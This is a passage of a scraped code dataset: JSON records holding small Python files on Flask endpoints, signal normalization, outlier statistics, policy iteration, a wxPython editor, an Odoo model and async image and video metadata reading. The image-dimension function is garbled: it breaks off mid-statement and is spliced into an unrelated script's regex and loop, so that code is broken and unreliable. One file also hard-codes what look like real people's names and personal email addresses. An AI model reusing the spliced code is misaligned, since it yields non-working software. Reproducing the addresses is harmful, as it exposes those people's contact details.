QUEUE_SURFACE_HEIGHT)","repo_name":"Andrea-Oliveri/Tetris","sub_path":"src/graphics/regions/queue_region.py","file_name":"queue_region.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"36673686322","text":"import json\nfrom operator import itemgetter\nfrom flask import jsonify\n\ndata = [\n    {\n        \"id\": 1,\n        \"name\": \"Evans Forson\",\n        \"email\": \"ataforson@gmail.com\"\n    },\n    {\n        \"id\": 2,\n        \"name\": \"Georg Udosen\",\n        \"email\": \"datameshprojects@gmail.com\"\n    },\n    {\n        \"id\": 3,\n        \"name\": \"Fon Nkwenti\",\n        \"email\": \"fonnkwenti85@gmail.com\"\n    },\n    {\n        \"id\": 4,\n        \"name\": \"Franklin Tallah\",\n        \"email\": \"ftallah@gmail.com\"\n    },\n    {\n        \"id\": 5,\n        \"name\": \"Gabriel Sallah\",\n        \"email\": \"gabriel.sallah@gmail.com\"\n    },\n    {\n        \"id\": 6,\n        \"name\": \"Seyram Komla Sapaty\",\n        \"email\": \"komlasapaty@gmail.com\"\n    },\n    {\n        \"id\": 7,\n        \"name\": \"Nbanjika\",\n        \"email\": \"nbanjika@gmail.com\"\n    }\n]\n\n\ndef get_all(request):\n    \"\"\"Responds to any HTTP request.\n    Args:\n        request (flask.Request): HTTP request object.\n    Returns:\n        The response text or any set of values that can be turned into a\n        Response object using\n        `make_response`.\n    \"\"\"\n    return jsonify(data)\n\n\ndef get_names(request):\n    persons = json.loads(json.dumps(data))\n    names = {person['name'] for person in persons}\n    final = {\"Name\": list(names)}\n    if final:\n        return jsonify(final)\n    else:\n        return \"No records!\"\n\n\ndef get_name(request):\n    if request.args and 'id' in request.args:\n        person_id = request.args.get('id')\n        # ids are 1-based, so a valid id lies between 1 and len(data) inclusive\n        if 1 <= int(person_id) <= len(data):\n            p = [i for i in sorted(data, key=itemgetter('id')) if i[\"id\"] == int(person_id)]\n            if p:\n                return jsonify(p)\n            else:\n                return 'No such record found!'\n        else:\n            return \"No such record found!\"\n    else:\n        return \"Please pass an id query string value!\"\n","repo_name":"udoyen/study-jam-week-10","sub_path":"functions/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"17637013624","text":"'''\r\n\tNormalized results of the six side-face channels within one sample\r\n'''\r\nimport os\r\nimport pandas as pd \r\nimport numpy as np\r\nimport math\r\n\r\ndef norm_onefile(arr):\r\n\tnorm_list=[]\r\n\ti=0\r\n\twhile i<6:\t\t\t\t\t\t\t\t\t\t# take each column of the file in turn\r\n\t\tarr_column=np.array(arr[:,i])\r\n\t\t#print(arr_column)\r\n\r\n\t\tstart,end=0,32\t\t\t\t\t\t\t\t\t# each column splits into 150 cycles of 32 samples each\r\n\t\tvalue_list=[]\r\n\t\twhile end<=4800:\r\n\t\t    #arr_cycle=arr_column[start:end]\t\t\t# samples of the current cycle of this column\r\n\t\t    value_max=max(arr_column[start:end])\t\t# maximum of the cycle (highest point)\r\n\t\t    value_min=min(arr_column[start:end])\t\t# minimum of the cycle (lowest point)\r\n\t\t    value=(value_max+abs(value_min))/2\r\n\t\t    value=float('%.3f' % value)\r\n\t\t    value_list.append(value)\t\t\t\t\t# store the value computed for each cycle in value_list\r\n\r\n\t\t    start+=32\r\n\t\t    end+=32\r\n\r\n\t\tnorm=(math.fsum(value_list))/150\t\t\t\t# plug into the formula to get the normalization coefficient norm\r\n\t\tnorm=float('%.3f' % norm)\r\n\t\t#print(\"Normalization coefficient of side-face channel {} of sample 1:\\n{}\".format(i+1,norm))\r\n\t\tnorm_list.append(norm)\r\n\t\tarr_column1=arr_column/norm\t\t\t\t\t\t# normalize the whole column\r\n\t\tarr_column1=np.around(arr_column1,decimals=3)\r\n\t\t# print(\"Normalization coefficient of side-face channel {} of sample 1: {}\\nNormalized result:\\n{}\".format(i+1,norm,arr_column1))\r\n\t\t# print()\r\n\t\ti+=1\r\n\treturn norm_list\r\n\r\ndef main():\r\n\tarr = np.loadtxt('G:\\\\Desktop\\\\20150824190534Record.txt')\r\n\tnorm_list = norm_onefile(arr)\r\n\tprint(norm_list)\r\nif __name__ == '__main__':\r\n    main()","repo_name":"julietxiao/WaveClassification","sub_path":"2_norm_onefile_allcoulumns.py","file_name":"2_norm_onefile_allcoulumns.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
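The loop above computes, per column, 150 cycle statistics of 32 samples each and averages them into one normalization coefficient. A vectorized sketch of the same arithmetic (random data stands in for a real 4800-sample column):

```python
import numpy as np

column = np.random.randn(4800)             # stand-in for one side-face column
cycles = column.reshape(150, 32)           # 150 cycles of 32 samples each
values = (cycles.max(axis=1) + np.abs(cycles.min(axis=1))) / 2
norm = values.mean()                       # normalization coefficient
normalized = np.around(column / norm, decimals=3)
print(round(float(norm), 3), normalized[:5])
```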
+{"seq_id":"22416237094","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # 5 Number Summary\n# 1. Minimum Value\n# 2. q1 - 25th Percentile\n# 3. Median\n# 4. q3 - 75th Percentile\n# 5. Maximum\n\n# In[2]:\n\n\nimport numpy as np\nimport pandas as pd\n\n\n# In[6]:\n\n\nl_marks=[45,32,56,75,88,1000,88,669,45,78,25,47,65.69,75]\nnp.percentile(l_marks,[25])\n\n\n# In[7]:\n\n\n## values outside [Lower Fence ---> Higher Fence] are treated as outliers\n\n\n# In[9]:\n\n\nq1=np.percentile(l_marks,[25])\nq1\n\n\n# In[11]:\n\n\n# use \"maximum\" to avoid shadowing the built-in max()\nminimum,q1,q2,q3,maximum=np.quantile(l_marks,[0,0.25,0.50,0.75,1.0])\n\n\n# In[13]:\n\n\nmaximum\n\n\n# In[15]:\n\n\nIQR=q3-q1\n\n\n# In[16]:\n\n\nIQR\n\n\n# In[19]:\n\n\n# lower fence uses q1, higher fence uses q3 (not q1)\nlower_fence=q1-1.5*(IQR)\nhigher_fence=q3+1.5*(IQR)\n\n\n# In[20]:\n\n\nlower_fence\n\n\n# In[21]:\n\n\nhigher_fence\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"poojavats/Feature_Engineering","sub_path":"Handling Outlier.py","file_name":"Handling Outlier.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
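With the corrected fences (lower = Q1 - 1.5*IQR, higher = Q3 + 1.5*IQR), the two extreme marks in the list are flagged. A compact check:

```python
import numpy as np

l_marks = [45, 32, 56, 75, 88, 1000, 88, 669, 45, 78, 25, 47, 65.69, 75]
q1, q3 = np.quantile(l_marks, [0.25, 0.75])
iqr = q3 - q1
lower_fence, higher_fence = q1 - 1.5 * iqr, q3 + 1.5 * iqr
outliers = [x for x in l_marks if x < lower_fence or x > higher_fence]
print(outliers)   # [1000, 669]
```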
+{"seq_id":"789538307","text":"import unittest\nfrom PolicyIteration.policy_iteration import PolicyIteration\nfrom mdp.gridworld.grid_world_mdp import GridWorldMDP\nimport logging\nlogging.basicConfig(level=logging.INFO)\nclass TestPolicyIteration(unittest.TestCase):\n def test_evaluate_policy(self):\n mdp = GridWorldMDP(terminal_states=[(0,0),(3,3)])\n expected_policy = {(0, 1): {'UP': 1.0}, (1, 2): {'UP': 0.5, 'RIGHT': 0.5}, (3, 2): {'DOWN': 1.0}, (1, 3): {'RIGHT': 1.0}, (3, 0): {'DOWN': 0.5, 'LEFT': 0.5}, (3, 1): {'DOWN': 1.0}, (2, 1): {'DOWN': 0.5, 'LEFT': 0.5}, (2, 0): {'LEFT': 1.0}, (1, 1): {'UP': 0.5, 'LEFT': 0.5}, (2, 3): {'RIGHT': 1.0}, (2, 2): {'DOWN': 0.5, 'RIGHT': 0.5}, (1, 0): {'LEFT': 1.0}, (0, 2): {'UP': 1.0}, (0, 3): {'UP': 0.5, 'RIGHT': 0.5}}\n optimal_policy = PolicyIteration(mdp, max_iter=3,\n bellman_tolerance=0.01).find_optimal_policy()\n logging.info(\"Found Policy : %s\",optimal_policy)\n self.assertEqual(expected_policy, optimal_policy)\n\ndef main():\n unittest.main()\n\nif __name__ == \"__main__\":\n main()","repo_name":"swordofzeus/reinforcement-learning-library","sub_path":"tests/test_policy_iteration.py","file_name":"test_policy_iteration.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
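The evaluate step inside policy iteration is repeated Bellman-expectation sweeps. A self-contained sketch on a hypothetical 4-state corridor (reward -1 per move, state 3 terminal, uniform-random policy, gamma 1) - this is illustrative and not the GridWorldMDP class used in the test:

```python
import numpy as np

def step(s, a):                       # deterministic corridor transitions
    return max(0, min(3, s + a))

policy = {s: [(-1, 0.5), (1, 0.5)] for s in range(3)}   # uniform random
V = np.zeros(4)                       # state 3 is terminal, V[3] stays 0
for _ in range(200):                  # iterative policy evaluation
    new_V = np.zeros(4)
    for s in range(3):
        new_V[s] = sum(p * (-1.0 + V[step(s, a)]) for a, p in policy[s])
    V = new_V
print(np.round(V, 1))                 # [-12. -10.  -6.   0.]
```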
+{"seq_id":"31592241349","text":"\"\"\"\nthis file manages the custom TextCtrl by adding some functions to it (loading files etc.)\n\"\"\"\nimport wx\nimport os\nfrom . import backup\nimport globals as g\nimport shelve\nfrom settingsconfig import get, datapath\nfrom .Speak import speak\nfrom datetime import datetime\nfrom . import finder\nimport application\nfrom gui import text_viewer\n\nclass TextBox(wx.TextCtrl): #the custom class for the text box\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper().__init__(style=wx.TE_MULTILINE+wx.HSCROLL+wx.TE_PROCESS_TAB, *args, **kwargs)\n\t\tself.__oldContent = self.Value\n\t\tself.loaded = False\n\t\tself.Bind(wx.EVT_TEXT, self.OnWrite) if int(get(\"autosave\"))==1 else None # bind the edit box to save anything written to the backup file on update\n\t\tself.Bind(wx.EVT_KEY_DOWN, self.OnShortcuts)\n\n\t@property\n\tdef modified(self):\n\t\treturn self.__oldContent!=self.Value\n\n\t@modified.setter\n\tdef modified(self, value):\n\t\tif not value:\n\t\t\tself.__oldContent = self.Value\n\t\telse:\n\t\t\traise ValueError(\"error with set value\")\n\n\tdef GetInfo(self):\n\t\tif self.Value ==\"\": return speak(_(\"there is no text to get its info.\"))\n\t\twordsList = self.Value.split()\n\t\tcharacters = len(self.Value)\n\t\twords = len(wordsList)\n\t\tlines = self.NumberOfLines\n\t\tfrequentWord = max(wordsList, key=wordsList.count)\n\t\twordRepeted = wordsList.count(frequentWord)\n\t\turlCount = len(finder.FindUrls(self.Value))\n\t\temailsCount = len(finder.FindEmails(self.Value))\n\t\tif emailsCount>0:\n\t\t\temailsCount = _(\"emails count: {c}.\").format(c=emailsCount)\n\t\telse:\n\t\t\temailsCount=\"\"\n\t\tif urlCount>0:\n\t\t\turlCount = _(\"links count: {c}.\").format(c=urlCount)\n\t\telse:\n\t\t\turlCount=\"\"\n\t\tinfo =_(\"\"\"text info:\nCharacter count: {charCount}.\nwords count: {wrdCount}.\nlines count: {lnsCount}\nMost frequent word: {frequent} Which was repeated {repeted} times.\n{urlsc}\n{emailsc}\n \"\"\").format(charCount=characters, wrdCount=words, lnsCount=lines, frequent=frequentWord, repeted=wordRepeted, urlsc=urlCount, emailsc=emailsCount)\n\t\treturn info.strip()\n\n\tdef OnShortcuts(self, event):\n\t\tkey = event.GetKeyCode()\n\t\tif key == wx.WXK_F5:\n\t\t\tself.WriteTime()\n\t\telif key == wx.WXK_UP or key == wx.WXK_DOWN:\n\t\t\tself.SavePosition()\n\t\telif event.altDown and event.GetKeyCode()==ord(\"I\"):\n\t\t\ttext_viewer.viewer(self, _(\"text info\"), _(\"text info\"), self.GetInfo())\n\t\tif int(get(\"autosave\"))==2:\n\t\t\tif event.GetKeyCode()==wx.WXK_SPACE:\n\t\t\t\tself.OnWrite(None)\n\t\tevent.Skip()\n\n\tdef SavePosition(self):\n\t\ttry:\n\t\t\ttry:\n\t\t\t\tg.tabs[g.activeFile][\"line\"] = self.PositionToXY(self.InsertionPoint)[-1]\n\t\t\texcept KeyError:\n\t\t\t\tg.tabs[g.paths[g.tabIndex]][\"line\"] = self.PositionToXY(self.InsertionPoint)[-1]\n\t\t\tbackup.backup().UpdateAll(g.tabs)\n\t\texcept: pass\n\n\n\tdef WriteTime(self, event=None):\n\t\tdate = datetime.now().strftime(\"%I:%M %p %d/%m/%Y\") # %M is minutes; %m would insert the month\n\t\tself.WriteText(date)\n\t\tspeak(_(\"The time has been written successfully\"))\n\n\n\tdef OnWrite(self, event):\n\t\tif not self.loaded: return # check if the file has been loaded\n\t\ttry:\n\t\t\tg.tabs[g.activeFile][\"value\"] = self.Value\n\t\t\tg.tabs[g.activeFile][\"line\"] = self.PositionToXY(self.InsertionPoint)[-1]\n\t\texcept KeyError:\n\t\t\tg.tabs[g.paths[g.tabIndex]][\"value\"] = self.Value\n\t\t\tg.tabs[g.paths[g.tabIndex]][\"line\"] = self.PositionToXY(self.InsertionPoint)[-1]\n\t\texcept: pass\n\t\tbackup.backup().UpdateAll(g.tabs)\n\n\tdef NewTab(self):\n\t\tself.clear()\n\t\tnumber = 1\n\t\tnumbers = []\n\t\tfor tab in g.tabs:\n\t\t\tif g.tabs[tab][\"newTab\"]:\n\t\t\t\ttry:\n\t\t\t\t\tnumbers.append(int(g.tabs[tab][\"path\"].split(\" (\")[1].split(\")\")[0]))\n\t\t\t\texcept: pass\n\t\tnumbers.sort()\n\t\tfor n in numbers:\n\t\t\tif number==n:\n\t\t\t\tnumber=n+1\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tbreak\n\t\tfileName = _(\"new file ({num})\").format(num=number)\n\t\tbackup.backup().new(fileName, self.Value, True)\n\t\tg.UpdateTabs()\n\t\tg.tabIndex = g.paths.index(fileName)\n\t\tg.ChangeTitle(fileName)\n\t\tspeak(fileName)\n\t\tg.newTab = True\n\t\tself.loaded = True\n\n\tdef clear(self):\n\t\tself.loaded = False\n\t\tself.Value = \"\"\n\t\tself.__oldContent = \"\"\n\t\tg.activeFile = None\n\t\tg.newTab = False\n\t\tg.tabIndex = 0\n\t\tg.ChangeTitle(\"\")\n\n\tdef load_file(self, path):\n\t\tself.clear()\n\t\tpath = path.replace(\"\\\\\", \"/\")\n\t\tself.Value = \"\"\n\t\tself.__oldContent = \"\"\n\t\tg.last = path\n\t\twith shelve.open(os.path.join(datapath, \"backup\")) as f:\n\t\t\tf[\"last\"] = g.last\n\t\tif path in g.tabs:\n\t\t\tif not os.path.isfile(path) and not g.tabs[path][\"newTab\"]:\n\t\t\t\tmsg = wx.MessageBox(_(\"The file {f} doesn't exist anymore. do you want to keep this file in the editor?\").format(f=path), _(\"Keep non existing file\"), style=wx.YES_NO, parent=self.Parent)\n\t\t\t\tif msg == wx.NO:\n\t\t\t\t\tbackup.backup().delete(path)\n\t\t\t\t\tself.Parent.Parent.NextTab()\n\t\t\t\t\treturn\n\t\t\t\telse:\n\t\t\t\t\tg.tabs[path][\"newTab\"] = True\n\t\t\t\t\tbackup.backup().UpdateAll(g.tabs)\n\t\t\t\t\tg.UpdateTabs()\n\t\t\tself.Value = g.tabs[path][\"value\"]\n\t\t\tself.__oldContent = g.tabs[path][\"value\"]\n\t\t\ttry:\n\t\t\t\tself.InsertionPoint = self.XYToPosition(1, g.tabs[path][\"line\"])\n\t\t\texcept: pass\n\t\t\tif g.tabs[path][\"newTab\"]:\n\t\t\t\tg.activeFile = None\n\t\t\t\ttry:\n\t\t\t\t\tfn = os.path.basename(g.tabs[path][\"path\"])\n\t\t\t\texcept:\n\t\t\t\t\tfn = g.tabs[path][\"path\"]\n\t\t\t\tg.ChangeTitle(fn)\n\t\t\t\tg.newTab = True\n\t\t\t\tself.loaded = True\n\t\t\t\tg.UpdateTabs()\n\t\t\t\tg.tabIndex = g.paths.index(path)\n\t\t\t\treturn\n\t\telse:\n\t\t\ttry:\n\t\t\t\twith open(path, \"r\", encoding=\"utf-8\") as f:\n\t\t\t\t\tcontent = f.read()\n\t\t\texcept:\n\t\t\t\twith open(path, \"r\", encoding=\"ansi\") as f:\n\t\t\t\t\tcontent = f.read()\n\t\t\t# read the file once: a second f.read() would return an empty string\n\t\t\tself.Value = content\n\t\t\tself.__oldContent = content\n\n\t\tbackup.backup().new(path, self.Value, line=self.PositionToXY(self.InsertionPoint)[-1])\n\t\tg.activeFile = path\n\t\tg.ChangeTitle()\n\t\tg.newTab = False\n\t\tg.UpdateTabs()\n\t\tg.tabIndex = g.paths.index(path)\n\t\tself.loaded = True\n\n","repo_name":"abdallah-hader/advanced_notepad","sub_path":"scripts/editor.py","file_name":"editor.py","file_ext":"py","file_size_in_byte":5596,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"69"}
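`GetInfo` above finds the most frequent word with `max(wordsList, key=wordsList.count)`, which rescans the whole list for every word (quadratic). `collections.Counter` gets the same answer in one pass; a tiny sketch:

```python
from collections import Counter

words = "the cat and the hat and the bat".split()
frequent_word, repeated = Counter(words).most_common(1)[0]
print(frequent_word, repeated)   # the 3
```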
+{"seq_id":"40490306742","text":"import os\nimport shutil\n\norigin_dir_path = r'D:\\workspace\\dev\\floor'\nenglish_dir_path = r'D:\\workspace\\dev\\floor/eng'\n\n\ndef create_folder(directory):\n    try:\n        if not os.path.exists(directory):\n            os.makedirs(directory)\n    except OSError:\n        print('Error: Creating directory. ' + directory)\n\n\ndef filename_to_english(file_name):\n    print(file_name)\n    name = file_name.split('\\\\')[-1]\n    category = name.split('_')[0]\n\n    if category == '카펫':\n        eng_file_name = name.replace(category, 'carpet')\n    elif category == '장판':\n        eng_file_name = name.replace(category, 'linoleum')\n    elif category == '대리석':\n        eng_file_name = name.replace(category, 'marble')\n    elif category == '소음매트':\n        eng_file_name = name.replace(category, 'pad')\n    elif category == '마루':\n        eng_file_name = name.replace(category, 'wood')\n    else:\n        # unknown category: skip the file instead of crashing on an unbound name\n        print('Unknown category: ' + category)\n        return\n\n    jpg_name = eng_file_name\n\n    shutil.copyfile(file_name, os.path.join(english_dir_path, jpg_name))\n\n\ndef main():\n    floor_types = ['carpet', 'linoleum', 'marble', 'pad', 'wood']\n    create_folder(english_dir_path)\n\n    for floor_type in floor_types:\n        type_dir = os.path.join(origin_dir_path, floor_type)\n        for file in os.listdir(type_dir):\n            filename_to_english(os.path.join(type_dir, file))\n\n    print('done.')\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"vomin0107/dataset-handling","sub_path":"floor_kor2eng.py","file_name":"floor_kor2eng.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
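The if/elif ladder in `filename_to_english` is a fixed category table; a dict expresses it directly and fails loudly (KeyError) on anything unexpected. A sketch with a hypothetical input name:

```python
CATEGORY_EN = {"카펫": "carpet", "장판": "linoleum", "대리석": "marble",
               "소음매트": "pad", "마루": "wood"}

name = "카펫_0001.jpg"                       # hypothetical input file name
category = name.split("_")[0]
eng_name = name.replace(category, CATEGORY_EN[category])
print(eng_name)                              # carpet_0001.jpg
```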
+{"seq_id":"39910692560","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api, _\n\nclass DecLicenseDoc(models.Model):\n    \"\"\" Accompanying document for a customs declaration \"\"\"\n    _name = 'cus_center.dec_lic_doc'\n    _rec_name = 'dec_license_no'\n    _description = 'DecLicenseDoc'\n\n    dec_license_no = fields.Char(string=\"License No\")  # document number\n    # many-to-one link to the customs declaration\n    customs_dec_id = fields.Many2one(comodel_name=\"cus_center.customs_dec\", string=\"customs declaration\")\n    dec_license_doc_type_id = fields.Many2one(comodel_name=\"cus_args.dec_license_doc_type\", string=\"DecLicenseDoc type\")  # document type / document code\n\n","repo_name":"tintumonmartin/odoo-1","sub_path":"custom_addons/cus_center/models/customs_dec_lic_doc.py","file_name":"customs_dec_lic_doc.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"40110400852","text":"import logging\nimport shutil\nimport struct\n\nimport asyncio\nimport aiofiles\n\nimport eta.core.serial as etas\nimport eta.core.utils as etau\nimport eta.core.video as etav\n\nimport fiftyone.core.media as fom\n\n\nlogger = logging.getLogger(__name__)\n\n_FFPROBE_BINARY_PATH = shutil.which(\"ffprobe\")\n\n\nasync def get_metadata(filepath, media_type, metadata=None):\n \"\"\"Gets the metadata for the given media file.\n\n Args:\n filepath: the path to the file\n media_type: the media type of the collection\n metadata (None): a pre-existing metadata dict to use if possible\n\n Returns:\n metadata dict\n \"\"\"\n is_video = media_type == fom.VIDEO\n\n if metadata:\n if is_video:\n width = metadata.get(\"frame_width\", None)\n height = metadata.get(\"frame_height\", None)\n frame_rate = metadata.get(\"frame_rate\", None)\n\n if width and height and frame_rate:\n return {\n \"width\": width,\n \"height\": height,\n \"frame_rate\": frame_rate,\n }\n else:\n width = metadata.get(\"width\", None)\n height = metadata.get(\"height\", None)\n\n if width and height:\n return {\"width\": width, \"height\": height}\n\n try:\n return await read_metadata(filepath, is_video)\n except:\n pass\n\n if is_video:\n return {\"width\": 512, \"height\": 512, \"frame_rate\": 30}\n\n return {\"width\": 512, \"height\": 512}\n\n\nasync def read_metadata(filepath, is_video):\n \"\"\"Calculates the metadata for the given media path.\n\n Args:\n filepath: a filepath\n is_video: whether the file is a video\n\n Returns:\n dict\n \"\"\"\n if is_video:\n info = await get_stream_info(filepath)\n return {\n \"width\": info.frame_size[0],\n \"height\": info.frame_size[1],\n \"frame_rate\": info.frame_rate,\n }\n\n async with aiofiles.open(filepath, \"rb\") as f:\n width, height = await get_image_dimensions(f)\n return {\"width\": width, \"height\": height}\n\n\nasync def get_stream_info(path):\n \"\"\"Returns a :class:`eta.core.video.VideoStreamInfo` instance for the\n provided video path.\n\n Args:\n path: a video filepath\n\n Returns:\n a :class:`eta.core.video.VideoStreamInfo`\n \"\"\"\n if _FFPROBE_BINARY_PATH is None:\n raise RuntimeError(\n \"You must have ffmpeg installed on your machine in order to view \"\n \"video datasets in the App, but we failed to find it\"\n )\n\n proc = await asyncio.create_subprocess_exec(\n _FFPROBE_BINARY_PATH,\n \"-loglevel\",\n \"error\",\n \"-show_format\",\n \"-show_streams\",\n \"-print_format\",\n \"json\",\n \"-i\",\n path,\n stdout=asyncio.subprocess.PIPE,\n stderr=asyncio.subprocess.PIPE,\n )\n\n stdout, stderr = await proc.communicate()\n if stderr:\n raise ValueError(stderr)\n\n info = etas.load_json(stdout.decode(\"utf8\"))\n\n video_streams = [s for s in info[\"streams\"] if s[\"codec_type\"] == \"video\"]\n num_video_streams = len(video_streams)\n if num_video_streams == 1:\n stream_info = video_streams[0]\n elif num_video_streams == 0:\n logger.debug(\"No video stream found; defaulting to first stream\")\n stream_info = info[\"streams\"][0]\n else:\n logger.debug(\"Found multiple video streams; using first stream\")\n stream_info = video_streams[0]\n\n format_info = info[\"format\"]\n mime_type = etau.guess_mime_type(path)\n\n return etav.VideoStreamInfo(stream_info, format_info, mime_type=mime_type)\n\n\nasync def get_image_dimensions(input):\n \"\"\"Gets the dimensions of an image from its asynchronous byte stream.\n\n Args:\n input: file-like object with async read and seek methods\n\n Returns:\n the ``(width, height)``\n \"\"\"\n height 
= -1\n    width = -1\n    data = await input.read(26)\n    size = len(data)\n\n    if (size >= 10) and data[:6] in (b\"GIF87a\", b\"GIF89a\"):\n        # GIFs\n        w, h = struct.unpack(\"<HH\", data[6:10])\n        width = int(w)\n        height = int(h)\n    elif (\n        (size >= 24)\n        and data.startswith(b\"\\211PNG\\r\\n\\032\\n\")\n        and (data[12:16] == b\"IHDR\")\n    ):\n        # PNGs\n        w, h = struct.unpack(\">LL\", data[16:24])\n        width = int(w)\n        height = int(h)\n    elif (size >= 16) and data.startswith(b\"\\211PNG\\r\\n\\032\\n\"):\n        # older PNGs\n        w, h = struct.unpack(\">LL\", data[8:16])\n        width = int(w)\n        height = int(h)\n    elif (size >= 2) and data.startswith(b\"\\377\\330\"):\n        await input.seek(2)\n        b = await input.read(1)\n        while b and ord(b) != 0xDA:\n            while ord(b) != 0xFF:\n                b = await input.read(1)\n            while ord(b) == 0xFF:\n                b = await input.read(1)\n            if ord(b) >= 0xC0 and ord(b) <= 0xC3:\n                await input.read(3)\n                tmp = await input.read(4)\n                h, w = struct.unpack(\">HH\", tmp)\n                break\n            else:\n                tmp = await input.read(2)\n                await input.read(int(struct.unpack(\">H\", tmp)[0]) - 2)\n                b = await input.read(1)\n        width = int(w)\n        height = int(h)\n    elif (size >= 26) and data.startswith(b\"BM\"):\n        # BMP\n        headersize = struct.unpack(\"<I\", data[14:18])[0]\n        if headersize >= 40:\n            w, h = struct.unpack(\"<ii\", data[18:26])\n            width = int(w)\n            height = int(h)\n    elif (size >= 8) and data[:4] in (b\"II\\052\\000\", b\"MM\\000\\052\"):\n        # Standard TIFF, big- or little-endian\n        # BigTIFF and other different but TIFF-like formats are not\n        # supported currently\n        byteOrder = data[:2]\n        boChar = \">\" if byteOrder == \"MM\" else \"<\"\n        # maps TIFF type id to size (in bytes)\n        # and python format char for struct\n        tiffTypes = {\n            1: (1, boChar + \"B\"),  # BYTE\n            2: (1, boChar + \"c\"),  # ASCII\n            3: (2, boChar + \"H\"),  # SHORT\n            4: (4, boChar + \"L\"),  # LONG\n            5: (8, boChar + \"LL\"),  # RATIONAL\n            6: (1, boChar + \"b\"),  # SBYTE\n            7: (1, boChar + \"c\"),  # UNDEFINED\n            8: (2, boChar + \"h\"),  # SSHORT\n            9: (4, boChar + \"l\"),  # SLONG\n            10: (8, boChar + \"ll\"),  # SRATIONAL\n            11: (4, boChar + \"f\"),  # FLOAT\n            12: (8, boChar + \"d\"),  # DOUBLE\n        }\n        ifdOffset = struct.unpack(boChar + \"L\", data[4:8])[0]\n\n        countSize = 2\n        await input.seek(ifdOffset)\n        ec = await input.read(countSize)\n        ifdEntryCount = struct.unpack(boChar + \"H\", ec)[0]\n        # 2 bytes: TagId + 2 bytes: type + 4 bytes: count of values + 4\n        # bytes: value offset\n        ifdEntrySize = 12\n        for i in range(ifdEntryCount):\n            entryOffset = ifdOffset + countSize + i * ifdEntrySize\n            await input.seek(entryOffset)\n            tag = await input.read(2)\n            tag = struct.unpack(boChar + \"H\", tag)[0]\n            if tag == 256 or tag == 257:\n                # if type indicates that value fits into 4 bytes, value\n                # offset is not an offset but value itself\n                type = await input.read(2)\n                type = struct.unpack(boChar + \"H\", type)[0]\n                if type not in tiffTypes:\n                    raise MetadataException(\"Unable to read metadata\")\n                typeSize = tiffTypes[type][0]\n                typeChar = tiffTypes[type][1]\n                await input.seek(entryOffset + 8)\n                value = await input.read(typeSize)\n                value = int(struct.unpack(typeChar, value)[0])\n                if tag == 256:\n                    width = value\n                else:\n                    height = value\n            if width > -1 and height > -1:\n                break\n\n    elif size >= 2:\n        await input.seek(0)\n        reserved = await input.read(2)\n        if 0 != struct.unpack(\"|( )', re.A)\n\nfor i in range(300):\n    ran = random.randrange(1, count_xhj)\n    line = linecache.getline(r'D:\数据集\原数据集\it运维意图识别\小黄鸡_原本.txt', ran)\n    line = re.sub(pattern1, \"\", line.replace('\\n', '').replace('\\t', '').replace(\" \", \"\"))\n    strshuzu = jieba.cut(line)\n    file3.write(\" \".join(strshuzu)+',\\n')\n\n","repo_name":"lxxj422092598/dialogue_system_context_recognition","sub_path":"single_dialogue_context_recognition/pretreatment/entity_ner_train_produce.py","file_name":"entity_ner_train_produce.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
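The dimension reader above sniffs a handful of header layouts with `struct.unpack`. A minimal self-contained sketch of the PNG case, using a hypothetical 640x480 header built in memory (8-byte signature, 4-byte IHDR chunk length, b"IHDR", then big-endian 32-bit width and height):

```python
import struct

ihdr_body = struct.pack(">LLBBBBB", 640, 480, 8, 2, 0, 0, 0)
data = (b"\x89PNG\r\n\x1a\n" + struct.pack(">L", 13) + b"IHDR" + ihdr_body)[:26]

# width and height are big-endian 32-bit ints at bytes 16..24 of the header
if data.startswith(b"\x89PNG\r\n\x1a\n") and data[12:16] == b"IHDR":
    w, h = struct.unpack(">LL", data[16:24])
    print(w, h)   # 640 480
```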
+{"seq_id":"21777994312","text":"from .message_context import MessageContext, MessageContextType\nfrom .message_handlers import MessageHandlers\nfrom .. import MessageBusProtocol\nfrom ..composers import MessageBuilder\nfrom ..meta import MessageMetaInformation\nfrom ...logging import LoggerProtocol\nfrom ....utils import UnitID\nfrom ....utils.config import Configuration\n\n\nclass MessageService:\n \"\"\"\n Base class for all message services.\n\n A *message service* wraps message handlers and proper message context creation (i.e., using a flexible context type). It\n is used by the message bus as an encapsulated layer for message dispatching.\n \"\"\"\n\n def __init__(\n self,\n comp_id: UnitID,\n *,\n message_bus: MessageBusProtocol,\n context_type: type[MessageContextType] = MessageContext,\n ):\n \"\"\"\n Args:\n comp_id: The global component identifier.\n message_bus: The global message bus.\n context_type: The type to use when creating a message context.\n \"\"\"\n self._component_id = comp_id\n\n self._message_bus = message_bus\n self._message_handlers = MessageHandlers()\n self._context_type = context_type\n\n def create_context(\n self,\n msg_meta: MessageMetaInformation,\n *,\n logger: LoggerProtocol,\n config: Configuration,\n ) -> MessageContext:\n \"\"\"\n Creates a new service context.\n\n Args:\n msg_meta: The meta information of the message.\n logger: The logger to be used within the new context.\n config: The global component configuration.\n\n Returns:\n The newly created message context.\n \"\"\"\n return self._context_type(\n msg_meta,\n self.create_message_builder(),\n logger=logger,\n config=config,\n 